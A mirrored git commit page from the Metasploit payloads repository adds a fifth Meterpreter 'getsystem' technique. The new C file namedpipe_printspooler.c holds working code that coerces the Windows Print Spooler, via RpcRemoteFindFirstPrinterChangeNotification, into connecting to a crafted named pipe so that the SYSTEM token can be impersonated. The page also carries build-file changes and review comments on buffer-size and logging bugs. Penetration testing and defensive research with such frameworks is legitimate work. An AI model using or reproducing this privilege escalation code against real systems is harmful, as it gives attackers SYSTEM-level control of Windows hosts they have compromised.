mirror of https://github.com/rapid7/metasploit-payloads synced 2024-11-26 17:41:08 +01:00

Land #509, Metasploit-side logic to support a 5th getsystem mechanism

Merge branch 'land-509' into upstream-master
bwatters-r7 2022-01-21 17:50:29 -06:00
commit 2b607061c5
No known key found for this signature in database
GPG Key ID: ECC0F0A52E65F268
10 changed files with 335 additions and 18 deletions


@ -6,6 +6,7 @@
#include "common_metapi.h"
#include "namedpipe.h"
#include "namedpipe_rpcss.h"
#include "namedpipe_printspooler.h"
#include "tokendup.h"
/*!
@ -115,6 +116,14 @@ DWORD elevate_getsystem( Remote * remote, Packet * packet )
}
}
if (dwTechnique == ELEVATE_TECHNIQUE_ANY || dwTechnique == ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER) {
dprintf("[ELEVATE] Attempting ELEVATE_TECHNIQUE_PRINTSPOOLER_NAMEDPIPE (%u)", ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER);
if ( ( dwResult = elevate_via_namedpipe_printspooler(remote, packet)) == ERROR_SUCCESS) {
dwTechnique = ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER;
break;
}
}
} while( 0 );
if( response )
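Review bot: The debug string in the new branch names the technique `ELEVATE_TECHNIQUE_PRINTSPOOLER_NAMEDPIPE`, but the constant it tests and prints is `ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER`, so a log search for the real identifier will miss this line. I would change the message to `dprintf("[ELEVATE] Attempting ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER (%u)", ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER);`. The body of elevate_getsystem starts and ends outside this hunk, so any technique list in its header comment could not be checked from here.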


@ -11,6 +11,7 @@
#define ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE2 2 ///< Identifier for the Named Pipe service technique (#2)
#define ELEVATE_TECHNIQUE_SERVICE_TOKENDUP 3 ///< Identifier for the Token Duplication service technique.
#define ELEVATE_TECHNIQUE_SERVICE_NAMEDPIPE_RPCSS 4 ///< Identifier for the Named Pipe service technique (RPCSS variant)
#define ELEVATE_TECHNIQUE_NAMEDPIPE_PRINTSPOOLER 5 ///< Identifier for the Named Pipe technique (PrintSpooler variant)
typedef void (WINAPI * GETNATIVESYSTEMINFO)( LPSYSTEM_INFO lpSystemInfo ); ///< Stolen from ps.h


@ -7,13 +7,13 @@
* A post-impersonation callback that simply updates the meterpreter token to the
* current thread token. This is used by the standard service-based technique.
*/
DWORD post_callback_use_self(Remote * remote)
DWORD set_meterp_thread_use_current_token(Remote * remote)
{
HANDLE hToken = NULL;
// get a handle to this threads token
if (!OpenThreadToken(GetCurrentThread(), TOKEN_ALL_ACCESS, FALSE, &hToken)) {
dprintf("[ELEVATE] post_callback_use_self. OpenThreadToken failed");
dprintf("[ELEVATE] set_meterp_thread_use_current_token. OpenThreadToken failed");
return GetLastError();
}
@ -164,7 +164,7 @@ DWORD elevate_via_service_namedpipe(Remote * remote, Packet * packet)
"cmd.exe /c echo %s > %s", cpServiceName, cServicePipe);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallback = set_meterp_thread_use_current_token;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);
@ -304,7 +304,7 @@ DWORD elevate_via_service_namedpipe2(Remote * remote, Packet * packet)
}
hSem = CreateSemaphore(NULL, 0, 1, NULL);
PostImpersonation.pCallback = post_callback_use_self;
PostImpersonation.pCallback = set_meterp_thread_use_current_token;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cServicePipe, hSem, &PostImpersonation);


@ -5,6 +5,7 @@ typedef DWORD(*PostImpersonationCallback)(LPVOID);
DWORD THREADCALL elevate_namedpipe_thread(THREAD* thread);
DWORD elevate_via_service_namedpipe(Remote* remote, Packet* packet);
DWORD elevate_via_service_namedpipe2(Remote* remote, Packet* packet);
DWORD set_meterp_thread_use_current_token(Remote* remote);
typedef struct _PRIV_POST_IMPERSONATION {
PostImpersonationCallback pCallback;


@ -0,0 +1,260 @@
#include "precomp.h"
#include "common_metapi.h"
#include "namedpipe.h"
typedef void* PRINTER_HANDLE;
typedef wchar_t* STRING_HANDLE;
typedef struct _DEVMODE_CONTAINER {
DWORD cbBuf;
BYTE* pDevMode;
} DEVMODE_CONTAINER;
DWORD RpcOpenPrinter(STRING_HANDLE pPrinterName, PRINTER_HANDLE* pHandle, wchar_t* pDatatype, DEVMODE_CONTAINER* pDevModeContainer, DWORD AccessRequired);
DWORD RpcClosePrinter(PRINTER_HANDLE* phPrinter);
DWORD RpcRemoteFindFirstPrinterChangeNotification(PRINTER_HANDLE hPrinter, DWORD fdwFlags, DWORD fdwOptions, wchar_t* pszLocalMachine, DWORD dwPrinterLocal, DWORD cbBuffer, BYTE* pBuffer);
typedef NTSTATUS(WINAPI* PRtlGetVersion)(LPOSVERSIONINFOEXW);
DWORD WINAPI trigger_printer_connection(LPWSTR pPipeName);
DWORD elevate_via_namedpipe_printspooler(Remote* remote, Packet* packet)
{
DWORD dwResult = ERROR_SUCCESS;
THREAD* pThread = NULL;
HANDLE hSem = NULL;
char cPipeName1[MAX_PATH] = { 0 };
WCHAR cPipeName2[MAX_PATH] = { 0 };
DWORD dwPipeUid[2] = { 0, 0 };
OSVERSIONINFOEXW os = { 0 };
HMODULE hNtdll = NULL;
PRtlGetVersion pRtlGetVersion = NULL;
PRIV_POST_IMPERSONATION PostImpersonation;
do {
hNtdll = GetModuleHandleA("ntdll");
if (hNtdll == NULL) {
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: Failed to resolve RtlGetVersion");
}
pRtlGetVersion = (PRtlGetVersion)GetProcAddress(hNtdll, "RtlGetVersion");
if (pRtlGetVersion == NULL) {
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: Failed to resolve RtlGetVersion");
}
os.dwOSVersionInfoSize = sizeof(OSVERSIONINFOEXW);
if (pRtlGetVersion(&os)) {
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: RtlGetVersion failed");
}
// Works on 2016/8.1+
if (os.dwMajorVersion < 6 || (os.dwMajorVersion == 6 && os.dwMinorVersion < 3)) {
SetLastError(ERROR_CALL_NOT_IMPLEMENTED);
BREAK_ON_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler: Windows version not supported.")
}
// generate a pseudo random name for the pipe
dwPipeUid[0] = ((rand() << 16) | rand());
dwPipeUid[1] = ((rand() << 16) | rand());
_snprintf_s(cPipeName1, sizeof(cPipeName1), MAX_PATH, "\\\\.\\pipe\\%08x%08x\\pipe\\spoolss", dwPipeUid[0], dwPipeUid[1]);
_snwprintf_s(cPipeName2, sizeof(cPipeName2), MAX_PATH, L"%08x%08x", dwPipeUid[0], dwPipeUid[1]);
hSem = CreateSemaphore(NULL, 0, 1, NULL);
PostImpersonation.pCallback = set_meterp_thread_use_current_token;
PostImpersonation.pCallbackParam = remote;
pThread = met_api->thread.create(elevate_namedpipe_thread, &cPipeName1, hSem, &PostImpersonation);
if (!pThread) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. met_api->thread.create failed",
ERROR_INVALID_HANDLE);
}
if (!met_api->thread.run(pThread)) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. met_api->thread.run failed",
ERROR_ACCESS_DENIED);
}
// wait for the thread to create the pipe, if it times out terminate
if (hSem) {
if (WaitForSingleObject(hSem, 500) != WAIT_OBJECT_0) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. WaitForSingleObject failed",
ERROR_ACCESS_DENIED);
}
}
else {
Sleep(500);
}
trigger_printer_connection(cPipeName2);
// signal our thread to terminate if it is still running
met_api->thread.sigterm(pThread);
// and wait for it to terminate...
met_api->thread.join(pThread);
// get the exit code for our pthread
dprintf("[ELEVATE] dwResult before exit code: %u", dwResult);
if (!GetExitCodeThread(pThread->handle, &dwResult)) {
BREAK_WITH_ERROR("[ELEVATE] elevate_via_namedpipe_printspooler. GetExitCodeThread failed",
ERROR_INVALID_HANDLE);
}
dprintf("[ELEVATE] dwResult after exit code: %u", dwResult);
} while (0);
if (pThread) {
met_api->thread.destroy(pThread);
}
if (hSem) {
CloseHandle(hSem);
}
return dwResult;
}
DWORD WINAPI trigger_printer_connection(LPWSTR pPipeName)
{
PRINTER_HANDLE hPrinter = NULL;
DEVMODE_CONTAINER devModeContainer = { 0 };
LPWSTR pComputerName = NULL;
DWORD dwComputerNameLen = MAX_COMPUTERNAME_LENGTH + 1;
LPWSTR pPrinterName = NULL;
LPWSTR pCaptureServer = NULL;
DWORD dwResult = ERROR_SUCCESS;
do
{
pComputerName = (LPWSTR)malloc(dwComputerNameLen * sizeof(WCHAR));
if (!pComputerName)
{
BREAK_ON_ERROR("[ELEVATE] Out of Memory");
}
if (!GetComputerNameW(pComputerName, &dwComputerNameLen))
{
BREAK_ON_ERROR("[ELEVATE] GetComputerNameW failed");
}
pPrinterName = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
if (!pPrinterName)
{
BREAK_ON_ERROR("[ELEVATE] Out of Memory");
}
pCaptureServer = (LPWSTR)malloc(MAX_PATH * sizeof(WCHAR));
if (!pCaptureServer)
{
BREAK_ON_ERROR("[ELEVATE] Out of Memory");
}
_snwprintf_s(pPrinterName, MAX_PATH, _TRUNCATE, (LPWSTR)(L"\\\\%s"), pComputerName);
_snwprintf_s(pCaptureServer, MAX_PATH, _TRUNCATE, (LPWSTR)(L"\\\\localhost/pipe/%s"), pPipeName);
RpcTryExcept
{
if (RpcOpenPrinter(pPrinterName, &hPrinter, NULL, &devModeContainer, 0) == RPC_S_OK)
{
RpcRemoteFindFirstPrinterChangeNotification(hPrinter, PRINTER_CHANGE_ADD_JOB, 0, pCaptureServer, 0, 0, NULL);
RpcClosePrinter(&hPrinter);
}
}
RpcExcept(EXCEPTION_EXECUTE_HANDLER);
{
BREAK_WITH_ERROR("[ELEVATE] Out of Memory", RpcExceptionCode());
}
RpcEndExcept;
} while (0);
if (pComputerName)
{
free(pComputerName);
}
if (pPrinterName)
{
free(pPrinterName);
}
if (pCaptureServer)
{
free(pCaptureServer);
}
if (hPrinter)
{
RpcClosePrinter(&hPrinter);
}
return 0;
}
void __RPC_FAR* __RPC_USER midl_user_allocate(size_t cBytes)
{
return((void __RPC_FAR*) malloc(cBytes));
}
void __RPC_USER midl_user_free(void __RPC_FAR* p)
{
free(p);
}
const RPC_WSTR MS_RPRN_UUID = (RPC_WSTR)L"12345678-1234-ABCD-EF00-0123456789AB";
const RPC_WSTR InterfaceAddress = (RPC_WSTR)L"\\pipe\\spoolss";
// Taken from https://github.com/Paolo-Maffei/OpenNT/blob/master/printscan/print/spooler/spoolss/win32/bind.c#L65
handle_t __RPC_USER STRING_HANDLE_bind(STRING_HANDLE lpStr)
{
RPC_STATUS RpcStatus;
RPC_WSTR StringBinding;
handle_t BindingHandle;
WCHAR ServerName[MAX_PATH + 1];
DWORD i;
if (lpStr && lpStr[0] == L'\\' && lpStr[1] == L'\\') {
// We have a servername
ServerName[0] = ServerName[1] = '\\';
i = 2;
while (lpStr[i] && lpStr[i] != L'\\' && i < sizeof(ServerName)) {
ServerName[i] = lpStr[i];
i++;
}
ServerName[i] = 0;
}
else {
return FALSE;
}
RpcStatus = RpcStringBindingComposeW(
MS_RPRN_UUID,
(RPC_WSTR)L"ncacn_np",
(RPC_WSTR)ServerName,
InterfaceAddress,
NULL,
&StringBinding);
if (RpcStatus != RPC_S_OK) {
return(0);
}
RpcStatus = RpcBindingFromStringBindingW(StringBinding, &BindingHandle);
RpcStringFreeW(&StringBinding);
if (RpcStatus != RPC_S_OK) {
return(0);
}
return(BindingHandle);
}
void __RPC_USER STRING_HANDLE_unbind(STRING_HANDLE lpStr, handle_t BindingHandle)
{
RPC_STATUS RpcStatus;
RpcStatus = RpcBindingFree(&BindingHandle);
return;
}
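Review bot: Two size arguments in this new file are given in bytes where the loop or the API counts wide characters. In STRING_HANDLE_bind the copy loop is bounded by `i < sizeof(ServerName)`, which for a `WCHAR[MAX_PATH + 1]` array is roughly twice the element count, so a long server component in lpStr writes past the end of the stack buffer; bound it with `i < _countof(ServerName) - 1` so the terminator stored after the loop also fits. In elevate_via_namedpipe_printspooler the call `_snwprintf_s(cPipeName2, sizeof(cPipeName2), MAX_PATH, ...)` has the same unit mix-up and should pass `_countof(cPipeName2)`. Separately, `if (pRtlGetVersion(&os))` and the malloc checks use BREAK_ON_ERROR; if that macro takes its code from GetLastError() (its definition is not on this page), those paths can leave dwResult at ERROR_SUCCESS, so an explicit code via BREAK_WITH_ERROR looks safer. trigger_printer_connection also computes dwResult but ends with `return 0;`, and its RPC exception handler logs "[ELEVATE] Out of Memory"; returning dwResult and naming the RPC failure would make failures diagnosable.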


@ -0,0 +1,6 @@
#ifndef _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_ELEVATE_TECHNIQUES_NAMEDPIPE_PRINTSPOOLER_H
#define _METERPRETER_SOURCE_EXTENSION_PRIV_PRIV_SERVER_ELEVATE_TECHNIQUES_NAMEDPIPE_PRINTSPOOLER_H
DWORD elevate_via_namedpipe_printspooler(Remote* remote, Packet* packet);
#endif

0
c/meterpreter/source/extensions/priv/namedpipe_rpcss.c Executable file → Normal file

0
c/meterpreter/source/extensions/priv/namedpipe_rpcss.h Executable file → Normal file


@ -10,15 +10,51 @@ add_definitions(
if(MSVC)
set(CMAKE_C_FLAGS "${CMAKE_C_FLAGS} /MP")
else()
add_definitions(
'-D_WIN32_WINNT=0x601'
'-D__deref=SAL__deref'
'-D__deref_opt_bcount=SAL__deref_opt_bcount'
'-D__deref_opt_out_bcount=SAL__deref_opt_out_bcount'
'-D__deref_opt_out_opt=SAL__deref_opt_out_opt'
'-D__deref_out=SAL__deref_out'
'-D__deref_out_bcount=SAL__deref_out_bcount'
'-D__deref_out_bcount_opt=SAL__deref_out_bcount_opt'
'-D__deref_out_bcount_full=SAL__deref_out_bcount_full'
'-D__deref_out_ecount_full=SAL__deref_out_ecount_full'
'-D__field_bcount=DISCARD'
'-D__field_ecount=DISCARD'
'-D__field_xcount=DISCARD'
'-D__in_bcount_opt=SAL__in_bcount_opt'
'-D__in_ecount_opt=SAL__in_ecount_opt'
'-D__in_ecount_opt=SAL__in_ecount_opt'
'-D__format_string=SAL__format_string'
'-D__in_z='
'-D__inout_bcount_opt=SAL__inout_bcount_opt'
'-D__inout_bcount_part_opt=SAL__inout_bcount_part_opt'
'-D__out_bcount_full_opt=SAL__out_bcount_full_opt'
'-D__out_bcount_opt=SAL__out_bcount_opt'
'-D__out_bcount_part_opt=SAL__out_bcount_part_opt'
'-D__out_ecount_opt=SAL__out_ecount_opt'
'-D__out_xcount_opt=SAL__out_bcount_opt'
'-D__range=DISCARD2'
'-D__reserved=SAL__reserved'
'-D__success=DISCARD'
'-D__FUNCTION__=""'
'-D__struct_bcount=DISCARD'
)
endif()
include_directories(../../source/common)
include_directories(../../source/ReflectiveDLLInjection/common)
include_directories(../../source/extensions/kiwi/mimikatz/inc)
include_directories(../../source/extensions/kiwi/mimikatz/modules/rpc)
set(SRC_DIR ../../source/extensions/priv)
file(GLOB SRC_FILES
${SRC_DIR}/*.c
${MOD_DEF_DIR}/extension.def
../../source/extensions/kiwi/mimikatz/modules/rpc/kull_m_rpc_ms-rprn.c
)
add_library(${PROJECT_NAME} SHARED ${SRC_FILES})
set_target_properties(${PROJECT_NAME} PROPERTIES OUTPUT_NAME ${PROJECT_NAME}.${TARGET_ARCH})
@ -27,7 +63,7 @@ if(MSVC)
set_source_files_properties(${MOD_DEF_DIR}/extension.def PROPERTIES HEADER_FILE_ONLY TRUE)
endif()
set(LINK_LIBS psapi)
set(LINK_LIBS psapi rpcrt4)
target_link_libraries(${PROJECT_NAME} ${LINK_LIBS})
if(MSVC)
target_link_options(${PROJECT_NAME} PUBLIC "/ignore:4070")
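Review bot: In the non-MSVC `add_definitions` list, `'-D__in_ecount_opt=SAL__in_ecount_opt'` appears on two consecutive lines, and `'-D__out_xcount_opt=SAL__out_bcount_opt'` maps an xcount annotation onto the bcount name, which reads like a copy-paste slip unless it is deliberate. I would drop the duplicate and either correct the mapping or say in a comment why bcount stands in for xcount. The block also carries no explanation; a one-line comment stating that these definitions neutralise SAL annotations for the `kull_m_rpc_ms-rprn.c` source pulled in from the kiwi tree (if that is their purpose) would tell the next maintainer when they can be removed.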


@ -128,7 +128,7 @@
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -152,7 +152,7 @@
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DelayLoadDLLs>
@ -194,7 +194,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -218,7 +218,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DelayLoadDLLs>
@ -260,7 +260,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MinSpace</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -284,7 +284,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalLibraryDirectories>%(AdditionalLibraryDirectories)</AdditionalLibraryDirectories>
<SuppressStartupBanner>true</SuppressStartupBanner>
<DelayLoadDLLs>
@ -326,7 +326,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -349,7 +349,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalLibraryDirectories>
</AdditionalLibraryDirectories>
@ -392,7 +392,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\extensions\kiwi\mimikatz\modules\rpc;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>DEBUGTRACE;WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -415,7 +415,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalLibraryDirectories>
</AdditionalLibraryDirectories>
@ -458,7 +458,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClCompile>
<Optimization>MaxSpeed</Optimization>
<InlineFunctionExpansion>OnlyExplicitInline</InlineFunctionExpansion>
<AdditionalIncludeDirectories>..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<AdditionalIncludeDirectories>..\..\source\extensions\kiwi\mimikatz\modules\rpc;..\..\source\extensions\kiwi\mimikatz\inc;..\..\source\ReflectiveDLLInjection\common;..\..\source\extensions\priv\server;..\..\source\common;%(AdditionalIncludeDirectories)</AdditionalIncludeDirectories>
<PreprocessorDefinitions>WIN32;NDEBUG;_WINDOWS;_USRDLL;EXT_SERVER_PRIV_EXPORTS;_CRT_SECURE_NO_WARNINGS;%(PreprocessorDefinitions)</PreprocessorDefinitions>
<StringPooling>true</StringPooling>
<RuntimeLibrary>MultiThreaded</RuntimeLibrary>
@ -481,7 +481,7 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<Culture>0x0409</Culture>
</ResourceCompile>
<Link>
<AdditionalDependencies>psapi.lib;%(AdditionalDependencies)</AdditionalDependencies>
<AdditionalDependencies>psapi.lib;rpcrt4.lib;%(AdditionalDependencies)</AdditionalDependencies>
<SuppressStartupBanner>true</SuppressStartupBanner>
<AdditionalLibraryDirectories>
</AdditionalLibraryDirectories>
@ -521,10 +521,12 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
</ProjectReference>
</ItemGroup>
<ItemGroup>
<ClInclude Include="..\..\source\extensions\kiwi\mimikatz\modules\rpc\kull_m_rpc_ms-rprn.h" />
<ClInclude Include="..\..\source\extensions\priv\defs.h" />
<ClInclude Include="..\..\source\extensions\priv\elevate.h" />
<ClInclude Include="..\..\source\extensions\priv\fs.h" />
<ClInclude Include="..\..\source\extensions\priv\namedpipe.h" />
<ClInclude Include="..\..\source\extensions\priv\namedpipe_printspooler.h" />
<ClInclude Include="..\..\source\extensions\priv\namedpipe_rpcss.h" />
<ClInclude Include="..\..\source\extensions\priv\passwd.h" />
<ClInclude Include="..\..\source\extensions\priv\precomp.h" />
@ -533,9 +535,11 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ClInclude Include="..\..\source\extensions\priv\tokendup.h" />
</ItemGroup>
<ItemGroup>
<ClCompile Include="..\..\source\extensions\kiwi\mimikatz\modules\rpc\kull_m_rpc_ms-rprn.c" />
<ClCompile Include="..\..\source\extensions\priv\elevate.c" />
<ClCompile Include="..\..\source\extensions\priv\fs.c" />
<ClCompile Include="..\..\source\extensions\priv\namedpipe.c" />
<ClCompile Include="..\..\source\extensions\priv\namedpipe_printspooler.c" />
<ClCompile Include="..\..\source\extensions\priv\namedpipe_rpcss.c" />
<ClCompile Include="..\..\source\extensions\priv\passwd.c" />
<ClCompile Include="..\..\source\extensions\priv\priv.c" />
@ -546,4 +550,4 @@ copy /y "$(TargetDir)$(TargetFileName)" "$(ProjectDir)..\..\output\"</Command>
<ImportGroup Label="ExtensionTargets">
<Import Project="$(VCTargetsPath)\BuildCustomizations\masm.targets" />
</ImportGroup>
</Project>
</Project>
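Review bot: The `AdditionalIncludeDirectories` value changed in the hunk at line 392 lists `..\..\source\extensions\kiwi\mimikatz\inc` and `..\..\source\extensions\kiwi\mimikatz\modules\rpc` twice, once at the front and again just before `%(AdditionalIncludeDirectories)`, while the other five configurations list each directory once. The repetition does not affect the build but makes the configurations diverge, which hides real differences in later diffs. I would trim that value so it matches the other configurations.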